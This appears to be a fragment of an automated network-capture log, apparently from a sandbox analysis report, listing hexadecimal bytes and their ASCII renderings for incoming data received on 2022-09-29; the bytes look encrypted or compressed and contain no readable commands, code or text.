                                                                                                                                                    2022-09-29 12:59:08 UTC12165INData Raw: c4 34 49 26 b1 76 ac f2 6f ea a4 c7 9b 53 86 42 99 74 84 c8 11 e8 86 14 ed bd 89 a1 d5 ff 62 33 3b d1 95 1e fc a4 16 41 ea c6 a7 e6 ff 51 08 7f cb e7 8e 76 ea a4 d4 bb 3f b1 66 5c 1b 46 76 e5 d7 1b 2d 88 07 67 a8 c5 84 81 0f 57 c1 2f 16 ef 0d d4 2f a2 d0 d9 12 0d 62 a2 38 51 16 ef c7 18 6f 81 dc fd ac 18 63 b2 c8 46 ac 90 d5 e9 1c b4 1e c3 bc 16 59 bd 8f ab 42 13 b6 64 1d dd 44 19 9d e9 74 b4 74 2c a1 af ff f2 10 f0 67 8a ba 16 35 f2 a2 c4 43 99 32 06 1f d3 0a 77 3a d6 46 1a c6 6b 75 79 06 93 5b 36 3b ed e1 08 ee 1e 5a 57 39 56 c1 bb 20 d1 e8 5e 5e fa ef 62 ee d8 39 f0 78 a7 bb 20 a5 7e 3c ae 08 51 ad b2 7b 95 3f c8 1d 13 af fe df 70 68 00 a9 3c e9 a2 07 ca e4 eb 67 9b 26 7d 61 8b f1 8b 77 b5 b8 20 b3 ca 6f 88 e4 65 b8 22 0f 88 14 69 ef 43 a2 7f 05 8b a9
                                                                                                                                                    Data Ascii: 4I&voSBtb3;AQv?f\Fv-gW//b8QocFYBdDtt,g5C2w:Fkuy[6;ZW9V ^^b9x ~<Q{?ph<g&}aw oe"iC
                                                                                                                                                    2022-09-29 12:59:08 UTC12181INData Raw: af 05 18 7f 66 04 c4 f5 c0 ae 88 00 2b aa 98 ef 09 14 c7 b2 92 29 ab 12 71 ab 2d aa 3a d5 8e 8e 3c c1 1e ff 89 7a a7 3c ac 95 8d 80 e2 9f d5 f4 18 c8 e0 2d 58 21 94 99 ea 96 65 8f 9a cb 0e 69 43 69 2f c7 bb 22 af e3 bd 77 40 84 6b 7a 84 62 44 33 f7 27 0b 46 2f 87 ad 7a 3f a6 79 4e 0d 98 1b 6c 7a 09 de 62 a4 50 10 02 db 18 ce d1 95 7c 7b 62 dc 4c f8 88 1e ae e4 b3 21 df 45 ea a6 db 07 02 e7 4c 9e 5c be 5d 31 29 ab b9 27 13 38 f5 2f 63 3e a7 15 39 6b 63 c9 83 74 ad 9f 46 25 f0 51 8f 57 fb 1c e8 c7 b1 07 9d 3c 10 60 87 f1 bb 69 cb e3 8d 5e 57 e6 31 56 af a3 71 4a 07 51 53 92 b5 61 aa 3c 0c 3e fb 94 4a 6b d5 f0 df c0 36 0d e2 1b c1 38 0c 49 e0 7e 1d 54 38 e4 2e 09 1d 76 b9 42 3b 08 46 49 27 1b 44 de d2 03 ae b3 96 d5 be e7 dc 62 e3 47 db 27 21 1e c9 62 6c 52
                                                                                                                                                    Data Ascii: f+)q-:<z<-X!eiCi/"w@kzbD3'F/z?yNlzbP|{bL!EL\]1)'8/c>9kctF%QW<`i^W1VqJQSa<>Jk68I~T8.vB;FI'DbG'!blR
                                                                                                                                                    2022-09-29 12:59:08 UTC12197INData Raw: 79 e8 a2 aa 02 6d 5c f2 66 24 f2 9a e8 9d 90 1f 20 b3 f6 73 3c ae 7d f9 d6 eb 1f 87 30 3b 03 3f ad 78 f9 cd e1 c8 a7 2c 68 17 34 9f c8 9f 7c d0 83 2c 59 40 c5 33 f7 3e fa 6a 7f 6e f1 66 25 98 22 fe e3 ed e9 db 1e 27 11 d0 47 d2 1a b9 ee b6 59 6d 89 bc 5c 45 e5 e0 f2 e9 e1 30 32 63 23 08 e2 fc 55 58 56 88 34 ce ca a7 1f 45 7a 0d e6 e9 4c 17 2b a2 26 43 6e 97 d9 ea 39 32 dd ca d1 e6 3e 9a 74 5d 10 4a 26 d1 c0 55 51 48 62 f9 e2 fe 26 06 ab ba fa 27 71 8b be 12 c8 27 a5 3e f7 89 7b f2 a6 f0 fa d0 ab 91 18 e3 4d 76 69 59 96 6a e2 94 57 b0 43 cf ef 93 3a 8e 11 36 b3 bf 85 6d 21 91 bf ed 32 48 e2 99 2d 56 2c d3 7e b1 65 1f 79 e0 24 f4 98 4b 99 10 ef 33 31 55 a5 8e a2 15 11 97 05 51 5a 7f 18 a2 ce 0d ac 25 51 f4 3d b0 8f a0 86 02 a7 f5 12 cd e6 97 60 6c 24 18 10
                                                                                                                                                    Data Ascii: ym\f$ s<}0;?x,h4|,Y@3>jnf%"'GYm\E02c#UXV4EzL+&Cn92>t]J&UQHb&'q'>{MviYjWC:6m!2H-V,~ey$K31UQZ%Q=`l$
                                                                                                                                                    2022-09-29 12:59:08 UTC12213INData Raw: 3d 97 56 2f 2e 42 22 75 0a d5 1b 65 c4 d7 4f 1b be 98 ef a3 12 66 af 66 71 c1 d4 6c 8f 1d 41 9c fb c2 b9 0c 56 95 c1 dd 9b 8f 17 35 5b ef 4e b4 4e ab dc af e4 67 a5 79 3a d9 bb f9 1c 55 ea 0a ba 5c 49 e5 4f 21 b0 26 fd 97 08 7d b7 74 fd a6 5e ee da d7 40 24 69 e8 2d a9 f8 01 7c 10 b5 07 ae 1c b4 bf 50 29 d1 15 c1 bb d5 ff 28 74 a5 de a0 6b e9 19 bf 10 bf f5 d9 36 4b 92 66 77 98 b1 fd b5 cf eb 10 35 76 50 0f 8b 5d aa a9 09 01 91 0a e2 d2 60 c3 7c cc 7a 99 26 1f 8a ff ef 30 35 d0 7d 8c 8e 17 49 e4 89 fe 2e 59 2b 7b 34 9f 01 b9 d4 9b 8e be fc 4b b4 1e b5 fe bc 94 68 04 8d 2a f1 74 86 ca 32 ad 04 67 1a 73 31 7c 64 d3 bd 58 0d bb e2 4f 29 fe a0 a5 9d 40 09 91 48 56 ec 9a 6d f6 63 35 d9 77 80 d3 91 a6 e8 e6 73 1c 4c 70 f9 66 57 2a e8 6c 51 73 26 ad 21 a2 2e 4d
                                                                                                                                                    Data Ascii: =V/.B"ueOffqlAV5[NNgy:U\IO!&}t^@$i-|P)(tk6Kfw5vP]`|z&05}I.Y+{4Kh*t2gs1|dXO)@HVmc5wsLpfW*lQs&!.M
                                                                                                                                                    2022-09-29 12:59:08 UTC12229INData Raw: 85 d5 59 ec da d6 d1 78 76 ec 66 eb af cf 75 a7 06 8b 28 96 aa f8 6d a9 94 f3 96 dc 75 bc ff c7 b4 0d 69 94 08 f6 eb 98 83 15 77 4e 0b 28 b1 4a b5 08 09 f8 b8 ec e6 2a d1 09 7a b7 50 0c 2e 0d 4d 1a 8e d3 08 98 47 db be 1c 93 69 33 08 d0 1d 66 6e 47 92 83 a3 fa 08 36 84 0a 0e 0d f4 c8 c1 f1 f0 1e 2b 7d 06 1f e3 c3 55 f4 74 1f ad e2 72 aa d2 38 70 56 a2 f6 14 4b dd 29 64 26 45 28 56 19 ed a3 1c 8b a4 7c 7b de 50 48 6c 7a 1d 95 a3 d6 5e d0 4a fe 0c 70 9f 4b 30 3b 4b 33 77 53 52 32 e8 41 52 a8 05 6d 4e a1 d5 71 ec 73 ff 30 df 3c 33 6a e0 23 c8 c9 85 9a ce 44 5b db bf 24 be 32 e0 39 f7 e8 60 3b 7f 3c 2d 8e e2 e9 11 f3 f5 57 b0 c1 68 54 27 18 e1 9b 54 d1 65 c3 6f dd 49 b3 ec 87 ca 61 53 cf 4a 3b 0c eb 64 fe 93 ef a2 c4 eb 4a 85 06 bf a4 27 b6 68 82 21 7f e6 dd
                                                                                                                                                    Data Ascii: Yxvfu(muiwN(J*zP.MGi3fnG6+}Utr8pVK)d&E(V|{PHlz^JpK0;K3wSR2ARmNqs0<3j#D[$29`;<-WhT'TeoIaSJ;dJ'h!
                                                                                                                                                    2022-09-29 12:59:08 UTC12245INData Raw: 6b c6 7b 9f 54 95 a9 a1 42 d8 cd 9d 38 f7 f8 f2 55 93 d7 64 28 92 1c 43 7f 41 c1 9a aa 61 ec 14 d1 b9 89 af 70 47 d6 51 8d 01 07 48 5b cb ae 62 81 db 3d c9 6a 1f 7f d7 31 33 68 e7 25 94 08 92 34 7c c8 00 7f 22 74 30 23 2a d4 b3 9a 8b 02 c1 f6 9b 8d 1d d0 26 84 4d a5 5c 73 a8 94 32 fb 64 25 a5 c0 0d 41 66 e5 1e 9e c7 b5 40 98 f4 f1 bc b1 8f 35 57 47 15 45 04 a1 d7 a7 22 42 75 a2 cf ff 4a f9 5e ca 7b 5a dc b1 3c 7b 96 a3 55 64 5a eb 8d 72 24 ea a9 db 29 08 52 d1 c7 6d a1 b2 de 20 4c b6 7c 67 0a 80 00 39 1c ea a8 1c 50 9a 73 27 50 05 91 25 5b 63 d9 e9 5a f8 0c 5d 6b f7 31 2b 89 85 65 29 db 21 f6 91 e9 cf 78 ff 79 68 38 6f 56 0d f4 1e 71 74 f5 55 73 bc e6 da de 64 e5 ae 30 71 93 0c b0 8f ff 3f ed 69 64 06 3c c3 e9 8d 25 65 31 c9 5e 17 97 f5 76 6e 18 b4 37 db
                                                                                                                                                    Data Ascii: k{TB8Ud(CAapGQH[b=j13h%4|"t0#*&M\s2d%Af@5WGE"BuJ^{Z<{UdZr$)Rm L|g9Ps'P%[cZ]k1+e)!xyh8oVqtUsd0q?id<%e1^vn7
                                                                                                                                                    2022-09-29 12:59:08 UTC12261INData Raw: 56 4c b5 eb b0 e2 08 35 b4 35 f9 26 f1 05 b8 4c aa 6d 45 78 a1 d4 d4 73 55 72 c2 4b 32 6f 28 d8 ef 24 38 30 d3 45 bf 89 a7 0a 95 64 5c 1b 17 60 c0 2b 19 ee 93 68 05 5a 61 af 7b 28 12 b7 67 bc a4 aa 8b aa 56 ca 67 63 1d 4a 98 21 bf 71 cb 2b a7 93 a7 5c 3f a9 81 ea bc 75 30 f6 23 02 1e f3 46 ea 0e f2 39 c9 a5 c8 9b 43 14 d3 c6 d8 f5 92 3b e0 cd 35 f7 d2 42 da 97 37 fa bf ad 00 00 cf 4f ea bf 79 dc 16 ed 34 e4 3a c9 46 c3 2f a8 9b 2e 43 c9 81 08 91 65 11 78 59 3b ce 51 98 e0 5a 74 cd 68 4a d4 aa ef 5d 7f cf e6 87 37 e0 03 62 90 f7 5a 78 71 f4 58 a9 9b f8 96 4a 8e 22 31 2d c9 24 10 76 de b2 d9 2a 78 8d c4 73 02 00 70 a9 66 81 c6 c4 00 f3 e9 2b e5 62 42 e4 ed be e1 23 90 0a ee 62 bc 89 61 d4 9f 7a 09 06 f3 12 6e 9f 86 65 dd 38 98 0b 7b ca 4f f7 2b 9c 42 d0 40
                                                                                                                                                    Data Ascii: VL55&LmExsUrK2o($80Ed\`+hZa{(gVgcJ!q+\?u0#F9C;5B7Oy4:F/.CexY;QZthJ]7bZxqXJ"1-$v*xspf+bB#bazne8{O+B@
                                                                                                                                                    2022-09-29 12:59:08 UTC12277INData Raw: 23 a7 13 d3 49 64 be 36 fb d4 d7 6b f2 d4 cc a8 dc c6 54 e9 d1 55 fb b5 32 17 ce 2d 86 90 73 43 cf 86 70 3a 2a 04 82 be 32 4e 5f 25 17 4c 3b 37 1c 3b bc 56 a4 18 f4 bb 25 76 87 55 f2 b0 e2 23 f3 75 7b fd 19 ba 1d cf 50 8f 32 68 e5 0b 43 a1 2f 9f 26 01 d2 8a 8d 6c 06 60 b9 33 0d 1d 47 a4 82 89 ae 28 54 d6 81 b3 25 8d ab f1 86 f4 4d 22 98 2c 7d f4 0f 5d e5 2b a1 95 34 3e 93 a5 5a 20 6c 42 f0 a5 f0 34 af 31 5e fe 40 50 d9 de f3 28 27 ad 84 48 8a ca 51 68 d1 4e e2 0b 12 cf 4c c4 22 01 2a 67 7e 93 40 1f 3a ae 87 aa 3d 3a d2 23 79 cd 3c bc 84 6c e5 df a7 59 11 f0 f0 b3 75 9a f6 8a ec 88 ae fa 7b 07 20 46 d0 68 1b da 8f d0 a7 3d 1b 46 30 7b 5a 16 1a 36 e9 91 70 19 04 bd b9 10 4e 68 67 fc 30 f0 74 fc ae ca 17 63 ec f2 95 36 91 a4 d0 99 33 7b 4e d3 72 49 e7 64 cb
                                                                                                                                                    Data Ascii: #Id6kTU2-sCp:*2N_%L;7;V%vU#u{P2hC/&l`3G(T%M",}]+4>Z lB41^@P('HQhNL"*g~@:=:#y<lYu{ Fh=F0{Z6pNhg0tc63{NrId
                                                                                                                                                    2022-09-29 12:59:08 UTC12293INData Raw: 22 a4 44 67 6e ff 95 d6 1f a1 9d 49 d2 fc 5f 55 bb 2c d3 a9 e3 f0 54 f5 2a 56 d2 11 1f aa 47 99 d7 a9 11 2c 35 a6 ae 2d 09 c6 ba 8b 2b 86 22 28 9a aa a3 04 85 d4 eb 51 34 6b 4d a4 dc 77 5d b1 88 c7 a9 b7 cc 34 60 8b 4e 42 f0 db dd 70 1c 2c 45 6b f6 de 87 f5 b4 28 e1 b7 da ee 1c 66 66 dd 40 bc 97 6e 02 86 4c 97 22 0e d2 36 c3 cc 44 7c 46 ea 93 4a 4a 2b 67 00 a3 24 d5 23 83 72 d4 2d 60 12 6f 86 b3 e4 a6 9e ff 6f 27 72 f4 47 c4 79 ee 4c 59 0f ed 30 f5 a3 77 5c f8 cc 08 e4 ed 01 35 4a 3c 90 b9 28 69 c0 18 60 ce ec 5f a2 a6 a6 4f f1 0a ea fb 19 ab 10 a6 e9 17 78 49 39 96 61 72 8d c9 e5 b8 48 0b e9 6c 73 24 4d a0 0a 42 2d 6c f1 f9 a3 7d 71 c8 b4 98 6c 9d 42 7e e5 b1 3b 4b 5a 4e 8b 16 cc c0 bd d5 09 bd 07 40 b6 aa 93 f8 f7 1b 8d 86 79 e3 94 2d cf 78 ad 1a a7 18
                                                                                                                                                    Data Ascii: "DgnI_U,T*VG,5-+"(Q4kMw]4`NBp,Ek(ff@nL"6D|FJJ+g$#r-`oo'rGyLY0w\5J<(i`_OxI9arHls$MB-l}qlB~;KZN@y-x
                                                                                                                                                    2022-09-29 12:59:08 UTC12309INData Raw: 98 cd c4 cc 37 15 d6 d1 8d df 28 2a 7d f5 da 27 7e 61 a4 16 cd fd a8 85 65 6a 0b 6a 3b ac 14 67 9e 42 8e c6 68 a0 da b8 d4 a4 b9 a2 1d 18 03 3e 4e 82 9a 2f 9e 3d b1 90 9f f5 fd c8 9e 8f cf fe 09 5a fc ae 59 ff 94 b5 a3 62 b4 39 42 eb b3 59 0a 7b 6e 8f 56 e8 9b a5 c7 ca 50 95 5a d5 55 32 65 5b 9d 10 22 6d 58 2e bb f4 42 a5 d0 c1 c9 52 4f a5 83 da f8 ff e5 58 85 19 ad df bd 44 ab 85 ac 9f e2 92 d8 be cb ce d9 34 ba 80 cf d9 1e b9 29 59 c3 fd 9d 83 45 a0 76 bd 52 b6 aa 80 86 71 32 9c 3e 4d 10 37 0a 86 7e 64 89 31 db 92 74 38 3c aa 2a 3e 83 b4 dd 85 ff 67 13 b2 79 a6 17 6d de 63 cc 73 7e a2 8f 3a eb 21 2b 7d 62 ed 88 05 d4 cd 42 11 ce 07 82 5d b1 ae 7c da 51 f4 65 09 b9 70 d3 8f 7a 9c b5 14 70 6d f4 35 6c 67 2b 01 83 a1 bb 21 07 b7 01 56 c2 33 dd 20 33 02 31
                                                                                                                                                    Data Ascii: 7(*}'~aejj;gBh>N/=ZYb9BY{nVPZU2e["mX.BROXD4)YEvRq2>M7~d1t8<*>gymcs~:!+}bB]|Qepzpm5lg+!V3 31
                                                                                                                                                    2022-09-29 12:59:08 UTC12325INData Raw: b2 19 7b 27 d0 94 8a f3 6d e5 18 ab 0b 33 f9 58 de d7 a2 9d f8 bc 88 54 f8 9c 50 4b 38 23 4b 0f 60 51 f6 3e b7 29 8e df 44 88 04 d4 03 9e 9c 6b 98 b4 8a 2a 8e c1 ae 3a d4 85 1d 28 eb 04 a0 f0 f8 f0 82 78 d5 56 41 36 e2 d3 cd 6f f8 89 ef 02 2e 4b 84 cd d1 30 50 09 7d ca 29 9f ad 51 0c 41 1b c0 4e b8 84 29 73 19 8c af b7 3f a9 66 e9 0f 99 af f6 85 1c 6d ba 92 db b9 e8 1b 55 62 d7 3a 5a 69 85 d1 c3 35 06 e7 2b 01 0a ba a2 22 56 26 28 38 93 2e 31 9d 9e af 32 c3 70 b6 93 70 a7 45 77 7d 6f 5c 3e 9f 8e f5 ca b2 2e 7d 82 ce 5f 70 0b d4 fa ca fc f5 8f 4c 5b 25 90 4a f0 aa 5b 52 f5 b8 ae 5b f6 70 ed ba fc 85 30 9d 88 b5 77 b2 3a c3 f2 3c d3 09 04 6d b7 69 77 d3 3c 87 1e f5 59 f2 85 17 e6 c1 b5 8a d2 45 2d f6 37 21 75 f8 a7 df ee d5 fe 15 75 1c 35 c9 7c 97 9f 34 30
                                                                                                                                                    Data Ascii: {'m3XTPK8#K`Q>)Dk*:(xVA6o.K0P})QAN)s?fmUb:Zi5+"V&(8.12ppEw}o\>.}_pL[%J[R[p0w:<miw<YE-7!uu5|40
                                                                                                                                                    2022-09-29 12:59:08 UTC12341INData Raw: b1 6d 59 8f 55 e6 3d 95 39 fa 9f d2 87 2b c1 2d 73 39 a1 92 65 ee 1d c8 b4 5c 30 04 db 4a d4 59 df 32 f8 e3 e5 f9 7b dc 80 38 9e a7 34 c8 92 66 f8 d7 ef 95 af 90 f1 3f 91 bf cb 91 49 4c bc f5 d9 2a a9 ed 1b a0 87 18 ff 80 0c c4 bc b9 5c 79 39 80 ad 8b fe 34 6f f7 a5 1d f6 a0 97 b3 cc 44 10 16 33 ba 6d aa 69 e4 06 e3 22 a3 9c f6 0f d8 5d 2b f0 0d 90 61 22 51 42 a7 70 08 c4 fe 47 08 2b 5a 06 4d 4b 6c 05 1a 12 7a bd 0c f8 bd 51 ff da ec be 5b 5e 8b 2f 3f c9 9f 98 de 2b b9 07 27 c0 5b de ec dd 10 9e 57 46 ad 82 e6 bc ab a2 7c 7b a7 b6 97 06 de 0b f5 63 58 7a a3 40 02 93 a9 f2 45 45 fa 9e 41 a3 ff d3 ab 0b f3 63 67 4a 4c f1 5c 50 50 bb b2 31 73 55 70 6c b5 fc 91 3d 6b 5a 51 90 47 a3 23 6e f5 7d 5b 5e 3a 36 7e 86 02 ad c0 2c 29 54 d0 42 42 ec bb 4d 02 c5 27 ef
                                                                                                                                                    Data Ascii: mYU=9+-s9e\0JY2{84f?IL*\y94oD3mi"]+a"QBpG+ZMKlzQ[^/?+'[WF|{cXz@EEAcgJL\PP1sUpl=kZQG#n}[^:6~,)TBBM'
                                                                                                                                                    2022-09-29 12:59:08 UTC12357INData Raw: 0b 09 3f 0d 09 3f 59 83 3e 3d 45 3b 10 75 8f e5 4d 6c f7 c9 70 cd 9b 9d f6 12 31 3b 06 a1 31 d1 3e 29 af 4d 55 88 c6 4f f7 39 5f df 48 9a 56 b7 2f 3a b8 e3 4e 0e bd 6f fe 01 54 f5 bb bf 66 00 39 02 38 ed eb f6 f4 e8 cc 96 8e 68 d5 5d a4 f2 77 37 e2 dc ed 94 a6 98 d0 86 e6 34 03 a8 ec 64 fc b3 62 67 22 14 49 3c 9f 80 f6 b2 f1 dd 36 aa ca 57 fd 33 4b a3 a5 39 8a fe a3 28 20 57 fc e7 33 12 48 2c e2 27 09 20 01 43 5b e8 87 c3 20 d3 8a ce d7 82 b3 f0 0a 13 9f 9b 04 75 be d6 9c 86 bc 75 44 c6 8a 7d 82 7a 29 3e 1e 35 b8 44 38 33 eb a7 f3 62 97 59 79 ee b2 f8 c2 99 c8 fc f4 44 93 02 fa 3b 1f 8b b4 64 d3 ef fe 7b c0 f6 a9 13 1b fe 70 d0 4f 87 30 83 25 62 5a bd 0e 95 8c 9f 0b 4b de 4d fe 21 7c fd a3 65 4a 63 e6 22 54 54 09 23 1b 35 4c 10 c0 46 9b 29 8e 55 be af 68
                                                                                                                                                    Data Ascii: ??Y>=E;uMlp1;1>)MUO9_HV/:NoTf98h]w74dbg"I<6W3K9( W3H,' C[ uuD}z)>5D83bYyD;d{pO0%bZKM!|eJc"TT#5LF)Uh
                                                                                                                                                    2022-09-29 12:59:08 UTC12373INData Raw: 00 b8 ad 39 b1 8b 76 fc be 8e 7a b0 02 03 e2 82 1f 25 6b f0 67 9c 79 9e 90 74 5b f8 40 b0 b2 81 6e 9d 2e 91 f6 18 06 60 1a bd 3c a0 5b 82 b0 f9 8e d8 9c 82 7e 0c 79 cd b1 a1 27 bc 2b 8d c2 4f 3a 03 3d a2 01 c2 83 e7 ea e1 c2 88 ac b5 b6 59 c9 61 a6 66 95 b5 d4 45 fa 8d 49 f9 3d f4 10 dd 93 61 15 d2 2b a4 20 27 52 e5 dc 6c 12 3b 2e f7 09 3f b2 8d 65 e6 24 ce 1e 1c 66 36 fe 2a d7 e8 f8 93 8b 56 e8 51 68 c9 2d b4 6e 79 44 55 46 c5 e6 d4 bb da ce db 53 27 bc f2 b8 7b 1d 7b ff 55 1c 14 6e 47 97 e2 cb 8c 40 ff 8d 3c 3b be 96 c6 f8 25 28 a1 90 39 c2 dc 31 89 19 bd 80 b1 15 c4 e1 9a c4 42 50 2c ee 8d 0b 01 b1 5a 29 aa 1f e7 2c 2d 95 f3 c1 f6 f3 23 f5 77 34 51 96 07 61 be 3c 67 83 e3 f6 7a f6 9b 4d a2 a4 5d 92 e8 ce e1 ba ee 7a 33 a4 d2 32 62 86 04 51 cd ff 71 08
                                                                                                                                                    Data Ascii: 9vz%kgyt[@n.`<[~y'+O:=YafEI=a+ 'Rl;.?e$f6*VQh-nyDUFS'{{UnG@<;%(91BP,Z),-#w4Qa<gzM]z32bQq
                                                                                                                                                    2022-09-29 12:59:08 UTC12389INData Raw: 50 af 4c 6f c6 60 68 e9 f6 66 15 93 37 60 a6 09 ff 4d 16 a1 2e 8c e9 aa 17 54 0f 0c 1d 00 d7 a7 1d eb 44 09 9e 3d 3e 1a 15 ae 7d cd 92 74 ce 32 10 37 0d be f9 2b e6 e9 d0 22 58 62 e7 d2 44 a4 2e cc aa 96 2e 1d 88 b2 20 c0 68 5f 59 86 75 ce ac f5 19 93 19 f9 f8 00 7d 32 03 b5 7b 10 49 28 4f 55 0f b9 4a c3 00 56 a1 e6 83 3b 53 a6 0f 7e 43 81 14 fa 1f 26 2b 99 86 87 9a 59 b2 21 9c 18 92 ce 10 7e 18 5f 6f 4a ac 46 e4 5e c0 16 79 03 c2 e3 9d 99 09 b1 84 e2 48 9b 4b cd 98 9e 37 69 b5 06 5f 41 62 a6 7b 8e 58 78 59 61 ab 98 2c 2c 71 5a 95 04 8d 03 34 b2 9c 48 6a 6e cd 51 93 63 3a 8a 93 e9 9d 36 6d 68 11 74 b3 40 1c 5e 1f d5 9e d1 c5 9a fa 3e 6a 15 40 77 f9 14 0e 50 98 cd 63 ed fb a5 65 90 d2 9c da e2 24 7c ab e9 ab ea 7c 63 ce f0 06 a9 c8 c9 42 b4 19 38 42 8c 49
                                                                                                                                                    Data Ascii: PLo`hf7`M.TD=>}t27+"XbD.. h_Yu}2{I(OUJV;S~C&+Y!~_oJF^yHK7i_Ab{XxYa,,qZ4HjnQc:6mht@^>j@wPce$||cB8BI
                                                                                                                                                    2022-09-29 12:59:08 UTC12398INData Raw: e4 af 97 df 95 5e f4 50 e7 1c b5 d4 38 c4 61 30 53 83 47 17 22 07 ff 4d a3 f2 a8 b4 03 05 70 05 f5 cf 4f 8b 45 ee 94 f3 92 29 e6 3f 02 db 3e 52 2c cb ba 25 ec 6e 19 01 df e8 10 b3 0f 02 7a b4 b2 9f 4c d9 8a 31 12 c1 4e c6 fb fc 4a 6a 44 ff 62 5e 28 cd 30 e1 6c 47 55 b9 b5 ba e4 7b df 98 22 18 42 0b 6f 59 56 c6 c7 0a 38 0f 08 73 8a 19 a7 4e 0a d5 47 72 3c 13 ee 85 4c b5 2d 6b 36 e6 05 f1 0b 13 cb 30 9a 7b 04 6a 80 0a 4d e3 5a 33 59 7c 07 a9 c0 aa 77 57 66 61 bd c9 5e 15 57 48 4c 92 ac eb f1 86 59 b6 5e 52 97 94 97 1e ee 50 09 a5 b2 32 0c e7 00 f5 67 4f e5 b7 d0 ce 13 38 61 17 12 44 ef a8 3e 86 ca 38 05 ab 18 cf ec 88 0c 69 cd 6a 41 13 51 af 8d c3 d2 eb 6c 57 76 21 b4 06 ae fc 13 77 17 22 0a bb cf a7 db 87 dc 9b 71 3c 82 45 5f 94 40 a0 a1 03 99 39 8d 9d 2b
                                                                                                                                                    Data Ascii: ^P8a0SG"MpOE)?>R,%nzL1NJjDb^(0lGU{"BoYV8sNGr<L-k60{jMZ3Y|wWfa^WHLY^RP2gO8aD>8ijAQlWv!w"q<E_@9+
                                                                                                                                                    2022-09-29 12:59:08 UTC12414INData Raw: 84 dc 54 d3 bc 69 f8 c6 4b 29 d1 8a 8f c3 aa 08 29 e2 67 20 8d 1d 58 4e 7b fe 8e ba 62 18 e8 0b b6 d4 a5 e9 54 50 27 bb 4d bb fb fe 40 23 9c 86 50 0f ba 6c 95 70 05 a1 6a 9e c0 93 f3 7e 0b 63 73 6f 53 af 8f c4 62 91 3e 3f b8 74 05 fe f8 db e4 ab 81 3f 0a b7 a5 bd 4d 85 a6 44 2b be cf 8e 9f 69 54 d2 de fa 38 ae 36 a3 18 7a d0 c3 b5 87 bc 39 47 e1 e5 fc 2b 22 5e 05 b8 a5 e7 6e 16 ee 88 73 40 f6 df 4c fe 6a 23 43 36 40 0a 78 24 57 8a 19 0f 83 d3 6e b8 b8 64 60 82 e8 8d b2 b0 3d ef ad 9b 29 ee 75 6c e3 27 35 3d ed 9e 4f 3a e1 f5 32 b4 6f 92 91 c2 47 c8 e1 e6 60 ce 31 99 c5 42 cd 0d 0d 15 ae fb 80 b0 eb 8f 54 82 a9 1f 45 ea 7d cc 74 8d 27 e3 c2 cf 16 5d 50 8f 15 2a 65 76 aa 72 08 8c 26 3c 9b bf e3 cf 7f 61 76 32 4f dd e5 86 b0 dc 6d d3 0a 86 4c d3 74 8d d8 f3
                                                                                                                                                    Data Ascii: TiK))g XN{bTP'M@#Plpj~csoSb>?t?MD+iT86z9G+"^ns@Lj#C6@x$Wnd`=)ul'5=O:2oG`1BTE}t']P*evr&<av2OmLt
                                                                                                                                                    2022-09-29 12:59:08 UTC12430INData Raw: c0 ba 4c af 3b da ff 7b 50 c9 91 38 69 74 9f 31 6e cd cc f7 a3 4d 02 5d 6a 25 8c a0 9b b9 12 b4 a9 d1 37 b2 b6 2e 28 cf 0c 55 da 5e 7f d0 5f f2 2f ca 24 78 bb 2e 74 fe 69 5c 9a 86 ef 7a 4a cf 6f b4 91 ac f9 7c 60 40 39 62 b7 0f 96 43 06 d2 78 4d 19 36 b8 b8 0a df 26 94 c0 a0 9b 23 92 f5 56 b6 2b bd 39 08 af fe 21 8e aa 21 b4 31 5e 35 85 71 f1 3e e4 f4 e4 75 a8 fa 20 51 3b d0 b7 47 90 c3 bd fd 1c a6 af ed 34 c4 18 b6 ef 57 6e 9f e4 9e 77 b5 29 53 77 12 42 d0 65 cb ce 52 96 e2 68 2d a0 55 b6 73 77 1e e3 94 0a 53 2a f1 68 78 74 4b 4b 14 f3 f4 a4 b9 60 6b 1c 3d 47 9f 5c ec 53 7e 3b c6 2b ca 19 af 9c c0 5d 23 1d 32 15 9f 63 dd 17 dc 28 22 8d 10 bf 0c 47 42 08 c6 03 e4 f1 e8 3a a0 9f 2f 21 22 73 7d 36 f1 dd 35 8f 2c b9 13 de 36 ab 05 57 84 45 08 54 4e d9 00 e7
                                                                                                                                                    Data Ascii: L;{P8it1nM]j%7.(U^_/$x.ti\zJo|`@9bCxM6&#V+9!!1^5q>u Q;G4Wnw)SwBeRh-UswS*hxtKK`k=G\S~;+]#2c("GB:/!"s}65,6WETN
                                                                                                                                                    2022-09-29 12:59:08 UTC12446INData Raw: 8d 98 26 3c 3f 7d 18 bf 39 79 76 50 85 f1 2e f7 d8 66 0e 0c ff 98 e3 58 ee f2 91 9a 82 1a 41 85 8e d6 3f 69 85 c2 8f 4e 47 19 ec df 0d c6 8f a2 55 03 b1 3b b4 a5 f5 4e f1 d0 bc 14 65 db d5 72 ce 80 72 77 4d a2 29 9c 9c 80 f2 5c 09 83 23 db 0e 12 69 0b 4e c4 36 df 91 3c 76 a5 75 d2 1f a6 56 2c b9 3c 9f 93 be c9 6f 88 9e c5 58 0d fa 0f 36 83 e1 a8 00 11 78 b2 2b 65 20 f9 a7 3c 6a 8b e0 9b 7c 7d 83 d7 f5 cf 0e 2d 84 8c ee 47 52 9f 4a 82 92 ce e5 ba ae 13 3c ae a5 aa db c1 f1 54 68 2c b4 fc 80 3c 47 c3 75 9c b9 09 60 27 d2 98 ca 54 b8 30 83 b5 2a 41 f7 85 55 b6 ee 48 69 22 37 d7 df 6a 16 12 38 03 3c f9 70 83 bb f3 87 d1 d8 ff cc 5f 83 a6 77 2e 24 8b bd 37 8d f0 5f f6 85 c3 d3 7b aa db 77 a6 32 47 6b fb 4c e9 42 ee c5 fd 1e 4a c1 e5 f4 6e 77 93 49 17 12 e9 78
                                                                                                                                                    Data Ascii: &<?}9yvP.fXA?iNGU;NerrwM)\#iN6<vuV,<oX6x+e <j|}-GRJ<Th,<Gu`'T0*AUHi"7j8<p_w.$7_{w2GkLBJnwIx
